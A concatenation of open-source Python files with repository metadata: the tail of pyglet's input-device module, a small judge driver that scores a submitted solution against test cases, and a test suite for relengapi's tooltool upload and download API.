OS X and Windows. On Linux, defaults to the default display
device.
:rtype: list of `Device`
'''
def get_joysticks(display=None):
'''Get a list of attached joysticks.
:Parameters:
`display` : `Display`
The display device to query for input devices. Ignored on Mac
OS X and Windows. On Linux, defaults to the default display
device.
:rtype: list of `Joystick`
'''
def get_tablets(display=None):
'''Get a list of tablets.
This function may return a valid tablet device even if one is not
attached (for example, it is not possible on Mac OS X to determine if
a tablet device is connected). Despite returning a list of tablets,
pyglet does not currently support multiple tablets, and the behaviour
is undefined if more than one is attached.
:Parameters:
`display` : `Display`
The display device to query for input devices. Ignored on Mac
OS X and Windows. On Linux, defaults to the default display
device.
:rtype: list of `Tablet`
'''
else:
def get_tablets(display=None):
return []
if sys.platform == 'linux2':
from x11_xinput import get_devices as xinput_get_devices
from x11_xinput_tablet import get_tablets
from evdev import get_devices as evdev_get_devices
from evdev import get_joysticks
def get_devices(display=None):
return (evdev_get_devices(display) +
xinput_get_devices(display))
elif sys.platform in ('cygwin', 'win32'):
from directinput import get_devices, get_joysticks
try:
from wintab import get_tablets
except:
pass
elif sys.platform == 'darwin':
from pyglet import options as pyglet_options
if pyglet_options['darwin_cocoa']:
from darwin_hid import get_devices, get_joysticks, get_apple_remote
else:
from carbon_hid import get_devices, get_joysticks, get_apple_remote
from carbon_tablet import get_tablets
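# Illustrative sketch (not part of pyglet): the five steps from the module
# docstring applied to the first attached joystick. get_joysticks, open(),
# close() and the on_joybutton_press event are part of the documented
# high-level interface; the handler body itself is just an example.
def _example_use_first_joystick():
    joysticks = get_joysticks()              # step 1: identify the device
    if not joysticks:
        return
    joystick = joysticks[0]                  # step 2: controls come from the interface
    @joystick.event                          # step 3: attach an event handler
    def on_joybutton_press(joystick, button):
        print 'button %d pressed' % button
    joystick.open()                          # step 4: begin receiving events
    # ... run the application's event loop; joystick.x, joystick.y and
    # joystick.buttons update asynchronously while the device is open ...
    joystick.close()                         # step 5: release the device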
|
mpasternak/pyglet-fix-issue-552
|
pyglet/input/__init__.py
|
Python
|
bsd-3-clause
| 7,205 | 0.001249 |
#! /usr/bin/python
# should move this file inside the docker image
import ast
import solution
'''Driver file that runs the submitted program.
It takes the test cases from the answers/question_name file
and executes each one. The output of every execution is
compared with the expected answer and the program prints a
binary string.
E.g. 1110111 means that out of 7 test cases the 4th failed
and the rest passed.
Resource/time limit errors are produced by the docker container.'''
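# Illustrative example (hypothetical): for a solution whose answer(x) returns
# x * x, an "answer" file with two test cases would look like
#     2
#     5
#     4
#     25
# i.e. inputs in the first half of the file and expected outputs in the
# second half, one literal per line (parsed with ast.literal_eval); running
# this driver would then print "11".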
# opening and parsing test cases
with open("answer") as case_file:  # change after development finishes
	cases = case_file.readlines()
	cases = [x.strip() for x in cases]
	cases = [ast.literal_eval(x) for x in cases]
s="" #return string
number_of_cases = len(cases)/2
for i in range(number_of_cases):
	if type(cases[i]) is tuple:
		# tuple inputs are unpacked into the solution's answer() arguments
		if cases[number_of_cases+i] == solution.answer(*cases[i]):
			s += "1"
		else:
			s += "0"
	else:
		if cases[number_of_cases+i] == solution.answer(cases[i]):
			s += "1"
		else:
			s += "0"
print s
|
akhilerm/Castle
|
storage/app/public/drivers/driver.py
|
Python
|
mit
| 1,024 | 0.019531 |
# This Source Code Form is subject to the terms of the Mozilla Public
# License, v. 2.0. If a copy of the MPL was not distributed with this
# file, You can obtain one at http://mozilla.org/MPL/2.0/.
from __future__ import absolute_import
import datetime
import hashlib
import json
import time
import urlparse
from contextlib import contextmanager
import boto.exception
import mock
import moto
import pytz
from nose.tools import eq_
from relengapi.blueprints import tooltool
from relengapi.blueprints.tooltool import tables
from relengapi.blueprints.tooltool import util
from relengapi.lib import auth
from relengapi.lib import time as relengapi_time
from relengapi.lib.permissions import p
from relengapi.lib.testing.context import TestContext
def userperms(perms, email='me'):
u = auth.HumanUser(email)
u._permissions = set(perms)
return u
cfg = {
'AWS': {
'access_key_id': 'aa',
'secret_access_key': 'ss',
},
'TOOLTOOL_REGIONS': {
'us-east-1': 'tt-use1',
'us-west-2': 'tt-usw2',
}
}
test_context = TestContext(config=cfg, databases=['relengapi'],
user=userperms([p.tooltool.download.public,
p.tooltool.upload.public]))
allow_anon_cfg = cfg.copy()
allow_anon_cfg['TOOLTOOL_ALLOW_ANONYMOUS_PUBLIC_DOWNLOAD'] = True
ONE = '1\n'
ONE_DIGEST = hashlib.sha512(ONE).hexdigest()
TWO = '22\n'
TWO_DIGEST = hashlib.sha512(TWO).hexdigest()
NOW = 1425592922
class NoEmailUser(auth.BaseUser):
type = 'no-email'
def get_id(self):
return 'no-email:sorry'
def get_permissions(self):
return [p.tooltool.upload.public]
def mkbatch(message="a batch"):
return {
'message': message,
'files': {
'one': {
'algorithm': 'sha512',
'size': len(ONE),
'digest': ONE_DIGEST,
'visibility': 'public',
},
},
}
def upload_batch(client, batch, region=None):
region_arg = '?region={}'.format(region) if region else ''
return client.post_json('/tooltool/upload' + region_arg, data=batch)
def add_file_to_db(app, content, regions=['us-east-1'],
pending_regions=[], visibility='public'):
with app.app_context():
session = app.db.session('relengapi')
file_row = tables.File(size=len(content),
visibility=visibility,
sha512=hashlib.sha512(content).hexdigest())
session.add(file_row)
session.commit()
for region in regions:
session.add(tables.FileInstance(
file_id=file_row.id, region=region))
for region in pending_regions:
session.add(tables.PendingUpload(
file=file_row, region=region,
expires=relengapi_time.now() + datetime.timedelta(seconds=60)))
session.commit()
return file_row
def add_batch_to_db(app, author, message, files):
with app.app_context():
session = app.db.session('relengapi')
batch = tables.Batch(author=author, message=message,
uploaded=relengapi_time.now())
session.add(batch)
for filename, file in files.iteritems():
session.add(tables.BatchFile(filename=filename, batch=batch, file=file))
session.commit()
return batch
def add_file_to_s3(app, content, region='us-east-1'):
with app.app_context():
conn = app.aws.connect_to('s3', region)
bucket_name = cfg['TOOLTOOL_REGIONS'][region]
try:
conn.head_bucket(bucket_name)
except boto.exception.S3ResponseError:
conn.create_bucket(bucket_name)
bucket = conn.get_bucket(bucket_name)
key_name = util.keyname(hashlib.sha512(content).hexdigest())
key = bucket.new_key(key_name)
key.set_contents_from_string(content)
@contextmanager
def set_time(now=NOW):
with mock.patch('time.time') as fake_time, \
mock.patch('relengapi.lib.time.now') as fake_now:
fake_time.return_value = now
fake_now.return_value = datetime.datetime.fromtimestamp(now, pytz.UTC)
yield
@contextmanager
def not_so_random_choice():
with mock.patch('random.choice') as choice:
choice.side_effect = lambda seq: sorted(seq)[0]
yield
def assert_signed_302(resp, digest, method='GET', region=None,
expires_in=60, bucket=None):
eq_(resp.status_code, 302)
url = resp.headers['Location']
assert_signed_url(url, digest, method=method, region=region,
expires_in=expires_in, bucket=bucket)
def assert_signed_url(url, digest, method='GET', region=None,
expires_in=60, bucket=None):
region = region or 'us-east-1'
bucket = bucket or cfg['TOOLTOOL_REGIONS'][region]
if region == 'us-east-1':
host = '{}.s3.amazonaws.com'.format(bucket)
else:
host = '{}.s3-{}.amazonaws.com'.format(bucket, region)
url = urlparse.urlparse(url)
eq_(url.scheme, 'https')
eq_(url.netloc, host)
eq_(url.path, '/' + util.keyname(digest))
query = urlparse.parse_qs(url.query)
assert 'Signature' in query
# sadly, headers are not represented in the URL
eq_(query['AWSAccessKeyId'][0], 'aa')
eq_(int(query['Expires'][0]), time.time() + expires_in)
def assert_batch_response(resp, author='me', message='a batch',
files={}):
eq_(resp.status_code, 200, resp.data)
result = json.loads(resp.data)['result']
eq_(result['author'], author)
# TODO: eq_(result[
eq_(result['message'], message)
eq_(set(result['files']), set(files))
for name, file in files.iteritems():
for k, v in file.iteritems():
eq_(result['files'][name][k], v,
"result['files'][{}][{}] {} != {}".format(
name, k, result['files'][name][k], v))
return result
def assert_batch_row(app, id, author='me', message='a batch', files=[]):
with app.app_context():
tbl = tables.Batch
batch_row = tbl.query.filter(tbl.id == id).first()
eq_(batch_row.author, author)
eq_(batch_row.message, message)
got_files = [(n, f.size, f.sha512, sorted(i.region for i in f.instances))
for n, f in batch_row.files.iteritems()]
eq_(sorted(got_files), sorted(files))
def assert_pending_upload(app, digest, region, expires=None):
    with app.app_context():
        tbl = tables.File
        file = tbl.query.filter(tbl.sha512 == digest).first()
        # index pending uploads by region so the expires check below
        # inspects the row for the requested region
        pending = dict((pu.region, pu) for pu in file.pending_uploads)
        assert region in pending, pending.keys()
        if expires:
            eq_(pending[region].expires, expires)
def assert_no_upload_rows(app):
with app.app_context():
eq_(tables.Batch.query.all(), [])
eq_(tables.PendingUpload.query.all(), [])
def assert_file_response(resp, content, visibility='public', instances=['us-east-1']):
eq_(resp.status_code, 200)
exp = {
"algorithm": "sha512",
"digest": hashlib.sha512(content).hexdigest(),
"size": len(content),
"visibility": visibility,
'instances': instances,
"has_instances": any(instances),
}
eq_(json.loads(resp.data)['result'], exp, resp.data)
def do_patch(client, algo, digest, ops):
return client.open(method='PATCH',
path='/tooltool/file/sha512/{}'.format(digest),
headers=[('Content-Type', 'application/json')],
data=json.dumps(ops))
# tests
def test_is_valid_sha512():
"""is_valid_sha512 recgnizes valid digests and rejects others"""
assert tooltool.is_valid_sha512(ONE_DIGEST)
assert tooltool.is_valid_sha512(TWO_DIGEST)
assert not tooltool.is_valid_sha512(ONE_DIGEST[-1])
assert not tooltool.is_valid_sha512(ONE_DIGEST + 'a')
assert not tooltool.is_valid_sha512('a' + ONE_DIGEST)
assert not tooltool.is_valid_sha512('j' * 128)
@test_context
def test_ui(client):
"""The root of the blueprint renders an angular HTML page"""
assert 'angular' in client.get('/tooltool/').data
@moto.mock_s3
@test_context
def test_upload_batch_empty_message(app, client):
"""A POST to /upload with an empty message is rejected."""
batch = mkbatch()
batch['message'] = ''
resp = upload_batch(client, batch)
eq_(resp.status_code, 400)
assert_no_upload_rows(app)
@moto.mock_s3
@test_context
def test_upload_batch_author(app, client):
"""A POST to /upload with an author is rejected."""
batch = mkbatch()
batch['author'] = 'me' # matches authentication
resp = upload_batch(client, batch)
eq_(resp.status_code, 400)
assert_no_upload_rows(app)
@moto.mock_s3
@test_context.specialize(user=NoEmailUser())
def test_upload_batch_no_user(app, client):
"""A POST to /upload with non-user-associated authentication succeeds,
using the string form of the token as author"""
batch = mkbatch()
resp = upload_batch(client, batch)
eq_(resp.status_code, 200)
assert_batch_response(resp, author='no-email:sorry', files={
'one': {'algorithm': 'sha512',
'size': len(ONE),
'digest': ONE_DIGEST}})
@moto.mock_s3
@test_context
def test_upload_batch_empty_files(app, client):
"""A POST to /upload with no files is rejected."""
batch = mkbatch()
batch['files'] = {}
resp = upload_batch(client, batch)
eq_(resp.status_code, 400)
assert_no_upload_rows(app)
@moto.mock_s3
@test_context
def test_upload_batch_bad_algo(app, client):
"""A POST to /upload with an algorithm that is not sha512 is rejected."""
batch = mkbatch()
batch['files']['one']['algorithm'] = 'md4'
resp = upload_batch(client, batch)
eq_(resp.status_code, 400)
assert_no_upload_rows(app)
@moto.mock_s3
@test_context
def test_upload_batch_bad_digest(app, client):
"""A POST to /upload with a bad sha512 digest is rejected."""
batch = mkbatch()
batch['files']['one']['digest'] = 'x' * 128
resp = upload_batch(client, batch)
eq_(resp.status_code, 400)
assert_no_upload_rows(app)
@moto.mock_s3
@test_context
def test_upload_batch_bad_size(app, client):
"""A POST to /upload with a file with the same digest and a different length
is rejected"""
batch = mkbatch()
batch['files']['one']['size'] *= 2 # that ain't right!
add_file_to_db(app, ONE)
resp = upload_batch(client, batch)
eq_(resp.status_code, 400)
assert_no_upload_rows(app)
@moto.mock_s3
@test_context.specialize(user=userperms([]))
def test_upload_batch_no_permissions(app, client):
"""A POST to /upload of a public file without permission to upload fails
with 403."""
batch = mkbatch()
add_file_to_db(app, ONE)
resp = upload_batch(client, batch)
eq_(resp.status_code, 403, resp.data)
assert_no_upload_rows(app)
@moto.mock_s3
@test_context
def test_upload_batch_mixed_visibility_no_permissions(app, client):
"""A POST to /upload of public and internal files fails with 403 if the
user only has permission to upload public files."""
batch = mkbatch()
batch['files']['two'] = {
'algorithm': 'sha512',
'size': len(TWO),
'digest': TWO_DIGEST,
'visibility': 'internal',
}
add_file_to_db(app, ONE)
resp = upload_batch(client, batch)
eq_(resp.status_code, 403, resp.data)
assert_no_upload_rows(app)
@moto.mock_s3
@test_context
def test_upload_batch_no_visibility(app, client):
"""If no visibility is supplied for a file in a batch, the request is
invalid (400)"""
# note that it's WSME that enforces this validity
batch = mkbatch()
del batch['files']['one']['visibility']
resp = upload_batch(client, batch)
eq_(resp.status_code, 400, resp.data)
assert_no_upload_rows(app)
@moto.mock_s3
@test_context
def test_upload_batch_success_fresh(client, app):
"""A POST to /upload with a good batch succeeds, returns signed URLs expiring
in one hour, and inserts the new batch into the DB with links to files, but
no instances, and inserts a pending upload row."""
batch = mkbatch()
with set_time():
with not_so_random_choice():
resp = upload_batch(client, batch)
result = assert_batch_response(resp, files={
'one': {'algorithm': 'sha512',
'size': len(ONE),
'digest': ONE_DIGEST}})
assert_signed_url(result['files']['one']['put_url'], ONE_DIGEST,
method='PUT', expires_in=60)
assert_batch_row(
app, result['id'], files=[('one', len(ONE), ONE_DIGEST, [])])
assert_pending_upload(app, ONE_DIGEST, 'us-east-1')
@moto.mock_s3
@test_context
def test_upload_batch_success_existing_pending_upload(client, app):
"""A successful POST to /upload updates the 'expires' column of any relevant
pending uploads."""
with set_time(NOW - 30):
add_file_to_db(app, ONE, regions=[], pending_regions=['us-east-1'])
batch = mkbatch()
with set_time():
with not_so_random_choice():
resp = upload_batch(client, batch)
result = assert_batch_response(resp, files={
'one': {'algorithm': 'sha512',
'size': len(ONE),
'digest': ONE_DIGEST}})
assert_signed_url(result['files']['one']['put_url'], ONE_DIGEST,
method='PUT', expires_in=60)
assert_pending_upload(
app, ONE_DIGEST, 'us-east-1',
expires=relengapi_time.now() + datetime.timedelta(seconds=60))
assert_batch_row(
app, result['id'], files=[('one', len(ONE), ONE_DIGEST, [])])
@moto.mock_s3
@test_context
def test_upload_batch_success_no_instances(client, app):
"""A POST to /upload with a batch containing a file that already exists, but
has no instances, succeeds, returns signed URLs expiring in one hour,
inserts the new batch into the DB with links to files, but no instances,
and inserts a pending upload row. This could occur when, for example,
re-trying a failed upload."""
batch = mkbatch()
add_file_to_db(app, ONE, regions=[])
with set_time():
with not_so_random_choice():
resp = upload_batch(client, batch)
result = assert_batch_response(resp, files={
'one': {'algorithm': 'sha512',
'size': len(ONE),
'digest': ONE_DIGEST}})
assert_signed_url(result['files']['one']['put_url'], ONE_DIGEST,
method='PUT', expires_in=60)
assert_batch_row(
app, result['id'], files=[('one', len(ONE), ONE_DIGEST, [])])
assert_pending_upload(app, ONE_DIGEST, 'us-east-1')
@moto.mock_s3
@test_context
def test_upload_batch_success_some_existing_files(client, app):
"""A POST to /upload with a good batch containing some files already present
succeeds, returns signed URLs expiring in one hour, and inserts the new
batch into the DB with links to files, but no instances. Also, the
``region`` query parameter selects a preferred region."""
batch = mkbatch()
batch['files']['two'] = {
'algorithm': 'sha512',
'size': len(TWO),
'digest': TWO_DIGEST,
'visibility': 'public',
}
# make sure ONE is already in the DB with at least once instance
add_file_to_db(app, ONE, regions=['us-east-1'])
with set_time():
resp = upload_batch(client, batch, region='us-west-2')
result = assert_batch_response(resp, files={
'one': {'algorithm': 'sha512',
'size': len(ONE),
'digest': ONE_DIGEST},
'two': {'algorithm': 'sha512',
'size': len(TWO),
'digest': TWO_DIGEST},
})
# no put_url for the existing file
assert 'put_url' not in result['files']['one']
assert_signed_url(result['files']['two']['put_url'], TWO_DIGEST,
method='PUT', expires_in=60, region='us-west-2')
assert_batch_row(app, result['id'],
files=[
('one', len(ONE), ONE_DIGEST, ['us-east-1']),
('two', len(TWO), TWO_DIGEST, []),
])
assert_pending_upload(app, TWO_DIGEST, 'us-west-2')
@test_context
def test_upload_change_visibility(client, app):
"""Uploading a file that already exists with a different visibility level
fails with 400, even if there are no instances."""
batch = mkbatch()
batch['files']['one']['visibility'] = 'public'
add_file_to_db(app, ONE, regions=[], visibility='internal')
with set_time():
resp = upload_batch(client, batch, region='us-west-2')
eq_(resp.status_code, 400, resp.data)
assert_no_upload_rows(app)
@test_context
def test_upload_complete(client, app):
"""GET /upload/complete/<digest> when the pending upload has expired causes
a delayed call to check_file_pending_uploads and returns 202"""
with mock.patch('relengapi.blueprints.tooltool.grooming.check_file_pending_uploads') as cfpu:
with set_time(NOW - tooltool.UPLOAD_EXPIRES_IN - 1):
add_file_to_db(app, ONE, regions=[], pending_regions=['us-east-1'])
with set_time(NOW):
resp = client.get('/tooltool/upload/complete/sha512/{}'.format(ONE_DIGEST))
eq_(resp.status_code, 202, resp.data)
cfpu.delay.assert_called_with(ONE_DIGEST)
@test_context
def test_upload_complete_not_expired(client, app):
"""GET /upload/complete/<digest> when the pending upload has not expired returns
409 with a header giving the time until expiration."""
with mock.patch('relengapi.blueprints.tooltool.grooming.check_file_pending_uploads') as cfpu:
with set_time(NOW - tooltool.UPLOAD_EXPIRES_IN + 5):
add_file_to_db(app, ONE, regions=[], pending_regions=['us-east-1'])
with set_time(NOW):
resp = client.get('/tooltool/upload/complete/sha512/{}'.format(ONE_DIGEST))
eq_(resp.status_code, 409, resp.data)
eq_(resp.headers.get('x-retry-after'), '6') # 5 seconds + 1
eq_(cfpu.delay.mock_calls, [])
@test_context
def test_upload_complete_bad_digest(client, app):
"""GET /upload/complete/<digest> with a bad digest returns 400"""
with mock.patch('relengapi.blueprints.tooltool.grooming.check_file_pending_uploads') as cfpu:
resp = client.get('/tooltool/upload/complete/sha512/xyz')
eq_(resp.status_code, 400, resp.data)
cfpu.delay.assert_has_calls([])
@moto.mock_s3
@test_context
def test_download_file_no_such(app, client):
"""Getting /sha512/<digest> for a file that does not exist returns 404"""
resp = client.get('/tooltool/sha512/{}'.format(ONE_DIGEST))
eq_(resp.status_code, 404)
@moto.mock_s3
@test_context
def test_download_file_invalid_digest(app, client):
"""Getting /sha512/<digest> for an invalid digest returns 400"""
resp = client.get('/tooltool/sha512/abcd')
eq_(resp.status_code, 400)
@moto.mock_s3
@test_context
def test_download_file_no_instances(app, client):
"""Getting /sha512/<digest> for a file that exists but has no instances
returns 404"""
add_file_to_db(app, ONE, regions=[])
resp = client.get('/tooltool/sha512/{}'.format(ONE_DIGEST))
eq_(resp.status_code, 404)
@moto.mock_s3
@test_context
def test_download_file_no_permission(app, client):
"""Getting /sha512/<digest> for a file with a visibility the user doesn't
have permission for returns 404."""
add_file_to_db(app, ONE, visibility='internal')
resp = client.get('/tooltool/sha512/{}'.format(ONE_DIGEST))
eq_(resp.status_code, 403)
@moto.mock_s3
@test_context
def test_download_file_exists(app, client):
"""Getting /sha512/<digest> for an exisitng file returns a 302 redirect to
a signed URL in a region where it exists."""
add_file_to_db(app, ONE, regions=['us-west-2', 'us-east-1'])
with set_time():
with not_so_random_choice():
resp = client.get('/tooltool/sha512/{}'.format(ONE_DIGEST))
assert_signed_302(resp, ONE_DIGEST, region='us-east-1')
@moto.mock_s3
@test_context.specialize(user=None)
def test_download_file_anonymous_forbidden(app, client):
"""Anonymously downloading a public file is forbidden if
TOOLTOOL_ALLOW_ANONYMOUS_PUBLIC_DOWNLOAD is not set"""
add_file_to_db(app, ONE, regions=['us-west-2'], visibility='public')
resp = client.get('/tooltool/sha512/{}'.format(ONE_DIGEST))
eq_(resp.status_code, 403)
@moto.mock_s3
@test_context.specialize(user=None, config=allow_anon_cfg)
def test_download_file_anonymous_nonpublic_forbidden(app, client):
"""Anonymously downloading an i nternal file is forbidden even if
TOOLTOOL_ALLOW_ANONYMOUS_PUBLIC_DOWNLOAD is set"""
add_file_to_db(app, ONE, regions=['us-west-2'], visibility='internal')
resp = client.get('/tooltool/sha512/{}'.format(ONE_DIGEST))
eq_(resp.status_code, 403)
@moto.mock_s3
@test_context.specialize(user=None, config=allow_anon_cfg)
def test_download_file_anonymous_allowed(app, client):
"""Anonymously downloading a public file is allowed if
TOOLTOOL_ALLOW_ANONYMOUS_PUBLIC_DOWNLOAD is set"""
add_file_to_db(app, ONE, regions=['us-west-2'], visibility='public')
resp = client.get('/tooltool/sha512/{}'.format(ONE_DIGEST))
eq_(resp.status_code, 302)
@moto.mock_s3
@test_context
def test_download_file_exists_not_in_preferred_region(app, client):
"""Getting /sha512/<digest>?region=.. for an exisitng file that does not
exist in the requested region returns a signed URL for a region where the
file does exist."""
add_file_to_db(app, ONE, regions=['us-west-2'])
with set_time():
resp = client.get(
'/tooltool/sha512/{}?region=us-east-1'.format(ONE_DIGEST))
assert_signed_302(resp, ONE_DIGEST, region='us-west-2')
@moto.mock_s3
@test_context
def test_download_file_exists_region_choice(app, client):
"""Getting /sha512/<digest> for an exisitng file returns a 302 redirect to
a signed URL in the region where it exists."""
add_file_to_db(app, ONE, regions=['us-west-2', 'us-east-1'])
with set_time():
resp = client.get(
'/tooltool/sha512/{}?region=us-west-2'.format(ONE_DIGEST))
assert_signed_302(resp, ONE_DIGEST, region='us-west-2')
@moto.mock_s3
@test_context
def test_search_batches(app, client):
with set_time():
f1 = add_file_to_db(app, ONE)
f1j = {
"algorithm": "sha512",
"digest": ONE_DIGEST,
"size": len(ONE),
"visibility": "public",
"has_instances": True,
}
f2 = add_file_to_db(app, TWO)
f2j = {
"algorithm": "sha512",
"digest": TWO_DIGEST,
"size": len(TWO),
"visibility": "public",
"has_instances": True,
}
add_batch_to_db(
app, 'me@me.com', 'first batch', {'one': f1})
b1j = {
"author": "me@me.com",
"uploaded": "2015-03-05T22:02:02+00:00",
"files": {"one": f1j},
"id": 1,
"message": "first batch"
}
add_batch_to_db(
app, 'me@me.com', 'second batch', {'two': f2})
b2j = {
"author": "me@me.com",
"uploaded": "2015-03-05T22:02:02+00:00",
"files": {"two": f2j},
"id": 2,
"message": "second batch"
}
add_batch_to_db(
app, 'you@you.com', 'third batch', {'1': f1, '2': f2})
b3j = {
"author": "you@you.com",
"uploaded": "2015-03-05T22:02:02+00:00",
"files": {"1": f1j, "2": f2j},
"id": 3,
"message": "third batch"
}
for q, exp_batches in [
('me', [b1j, b2j]),
('ou@y', [b3j]),
('econd batc', [b2j]),
('', [b1j, b2j, b3j]),
]:
resp = client.get('/tooltool/upload?q=' + q)
eq_(resp.status_code, 200, resp.data)
eq_(sorted(json.loads(resp.data)['result']), sorted(exp_batches),
"got: {}\nexp: {}".format(resp.data, exp_batches))
@moto.mock_s3
@test_context
def test_get_batch_not_found(client):
resp = client.get('/tooltool/upload/99')
eq_(resp.status_code, 404, resp.data)
@moto.mock_s3
@test_context
def test_get_batch_found(client):
batch = mkbatch()
batch['files']['two'] = {
'algorithm': 'sha512',
'size': len(TWO),
'digest': TWO_DIGEST,
'visibility': 'public',
}
with set_time():
resp = upload_batch(client, batch)
eq_(resp.status_code, 200, resp.data)
resp = client.get('/tooltool/upload/1')
eq_(resp.status_code, 200, resp.data)
eq_(json.loads(resp.data)['result'], {
"author": "me",
"uploaded": "2015-03-05T22:02:02+00:00",
"files": {
"one": {
"algorithm": "sha512",
"digest": ONE_DIGEST,
"size": len(ONE),
"visibility": "public",
"has_instances": False,
},
"two": {
"algorithm": "sha512",
"digest": TWO_DIGEST,
"size": len(TWO),
"visibility": "public",
"has_instances": False,
}
},
"id": 1,
"message": "a batch"
}, resp.data)
@test_context
def test_get_files(app, client):
"""GETs to /file?q=.. return appropriately filtered files."""
f1 = add_file_to_db(app, ONE)
f1j = {
"algorithm": "sha512",
"digest": ONE_DIGEST,
"size": len(ONE),
"visibility": "public",
"has_instances": True,
}
f2 = add_file_to_db(app, TWO)
f2j = {
"algorithm": "sha512",
"digest": TWO_DIGEST,
"size": len(TWO),
"visibility": "public",
"has_instances": True,
}
add_batch_to_db(
app, 'me@me.com', 'first batch', {'one': f1})
add_batch_to_db(
app, 'me@me.com', 'second batch', {'two': f2})
add_batch_to_db(
app, 'you@you.com', 'third batch', {'1': f1, '2': f2})
for q, exp_files in [
('one', [f1j]),
('2', [f2j]),
(ONE_DIGEST[:8], [f1j]),
(ONE_DIGEST[10:20], []), # digests are prefix-only
('', [f1j, f2j]),
]:
resp = client.get('/tooltool/file?q=' + q)
eq_(resp.status_code, 200)
eq_(sorted(json.loads(resp.data)['result']), sorted(exp_files))
@test_context
def test_get_file_bad_algo(client):
"""A GET to /file/<algo>/<digest> with an unknown algorithm fails with 404"""
eq_(client.get('/tooltool/file/md4/abcd').status_code, 404)
@test_context
def test_get_file_not_found(client):
"""A GET to /file/sha512/<digest> with an unknown digest fails with 404"""
eq_(client.get(
'/tooltool/file/sha512/{}'.format(ONE_DIGEST)).status_code, 404)
@test_context
def test_get_file_success(app, client):
"""A GET to /file/sha512/<digest> with an known digest returns the file"""
add_file_to_db(app, ONE)
resp = client.get('/tooltool/file/sha512/{}'.format(ONE_DIGEST))
assert_file_response(resp, ONE)
@moto.mock_s3
@test_context.specialize(user=userperms([p.tooltool.manage]))
def test_patch_no_such(app, client):
"""A PATCH to /file/<a>/<d> that doesn't exist returns 404."""
resp = do_patch(client, 'sha512', ONE_DIGEST, [{'op': 'delete_instances'}])
eq_(resp.status_code, 404)
@moto.mock_s3
@test_context.specialize(user=userperms([p.tooltool.manage]))
def test_patch_bad_algo(app, client):
"""A PATCH to /file/<a>/<d> with a bad algorithm returns 404."""
resp = do_patch(client, 'md3', ONE_DIGEST, [{'op': 'delete_instances'}])
eq_(resp.status_code, 404)
@moto.mock_s3
@test_context.specialize(user=userperms([p.tooltool.manage]))
def test_patch_no_op(app, client):
"""A PATCH to /file/<a>/<d> with change containing no 'op' returns 400."""
add_file_to_db(app, ONE)
resp = do_patch(client, 'sha512', ONE_DIGEST, [{'pop': 'snap'}])
eq_(resp.status_code, 400)
@moto.mock_s3
@test_context.specialize(user=userperms([p.tooltool.manage]))
def test_patch_bad_op(app, client):
"""A PATCH to /file/<a>/<d> with change containing a bad 'op' returns 400."""
add_file_to_db(app, ONE)
resp = do_patch(client, 'sha512', ONE_DIGEST, [{'op': 'hop'}])
eq_(resp.status_code, 400)
@moto.mock_s3
@test_context
def test_patch_no_perms(app, client):
"""A PATCH to /file/<a>/<d> without tooltool.manage fails with 403"""
add_file_to_db(app, ONE, regions=['us-east-1'])
resp = do_patch(client, 'sha512', ONE_DIGEST, [{'op': 'delete_instances'}])
eq_(resp.status_code, 403)
@moto.mock_s3
@test_context.specialize(user=userperms([p.tooltool.manage]))
def test_delete_instances_success_no_instances(app, client):
"""A PATCH with op=delete_instances succeeds when there are no instances."""
add_file_to_db(app, ONE, regions=[])
resp = do_patch(client, 'sha512', ONE_DIGEST, [{'op': 'delete_instances'}])
assert_file_response(resp, ONE, instances=[])
@moto.mock_s3
@test_context.specialize(user=userperms([p.tooltool.manage]))
def test_delete_instances_success(app, client):
"""A PATCH with op=delete_instances deletes its instances."""
add_file_to_db(app, ONE, regions=['us-east-1'])
add_file_to_s3(app, ONE, region='us-east-1')
resp = do_patch(client, 'sha512', ONE_DIGEST, [{'op': 'delete_instances'}])
assert_file_response(resp, ONE, instances=[])
with app.app_context():
# ensure instances are gone from the DB
f = tables.File.query.first()
eq_(f.instances, [])
# and from S3
conn = app.aws.connect_to('s3', 'us-east-1')
key = conn.get_bucket(
'tt-use1').get_key(util.keyname(ONE_DIGEST))
assert not key, "key still exists"
@moto.mock_s3
@test_context.specialize(user=userperms([p.tooltool.manage]))
def test_set_visibility_invalid_vis(app, client):
"""A PATCH with op=set_visibility and an invalid visibility fails."""
add_file_to_db(app, ONE, regions=[])
resp = do_patch(client, 'sha512', ONE_DIGEST,
[{'op': 'set_visibility', 'visibility': '5-eyes'}])
eq_(resp.status_code, 400)
@moto.mock_s3
@test_context.specialize(user=userperms([p.tooltool.manage]))
def test_set_visibility_success(app, client):
"""A PATCH with op=set_visibility updates the file's visibility."""
add_file_to_db(app, ONE, visibility='public')
resp = do_patch(client, 'sha512', ONE_DIGEST,
[{'op': 'set_visibility', 'visibility': 'internal'}])
assert_file_response(resp, ONE, visibility='internal')
with app.app_context():
f = tables.File.query.first()
eq_(f.visibility, 'internal')
@moto.mock_s3
@test_context.specialize(user=userperms([p.tooltool.manage]))
def test_set_visibility_success_no_change(app, client):
"""A PATCH with op=set_visibility with the existing visibility succeeds."""
add_file_to_db(app, ONE, visibility='internal')
resp = do_patch(client, 'sha512', ONE_DIGEST,
[{'op': 'set_visibility', 'visibility': 'internal'}])
assert_file_response(resp, ONE, visibility='internal')
with app.app_context():
f = tables.File.query.first()
eq_(f.visibility, 'internal')
@moto.mock_s3
@test_context.specialize(user=userperms([p.tooltool.manage]))
def test_multi_op_patch(app, client):
"""A PATCH with multiple ops performs all of them."""
add_file_to_db(
app, ONE, visibility='internal', regions=['us-east-1', 'us-west-2'])
add_file_to_s3(app, ONE, region='us-east-1')
add_file_to_s3(app, ONE, region='us-west-2')
resp = do_patch(client, 'sha512', ONE_DIGEST, [
{'op': 'set_visibility', 'visibility': 'public'},
{'op': 'delete_instances'},
])
assert_file_response(resp, ONE, visibility='public', instances=[])
with app.app_context():
f = tables.File.query.first()
eq_(f.visibility, 'public')
eq_(f.instances, [])
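# Rough shape of the request exercised by the multi-op test above, assuming
# do_patch (a helper defined earlier in this module) JSON-encodes the list of
# operations into the PATCH body:
#
#   PATCH /tooltool/file/sha512/<digest>
#   [{"op": "set_visibility", "visibility": "public"},
#    {"op": "delete_instances"}]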
|
hwine/build-relengapi
|
relengapi/blueprints/tooltool/test_tooltool.py
|
Python
|
mpl-2.0
| 32,335 | 0.000526 |
# -*- coding: utf-8 -*-
# Copyright 2021 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
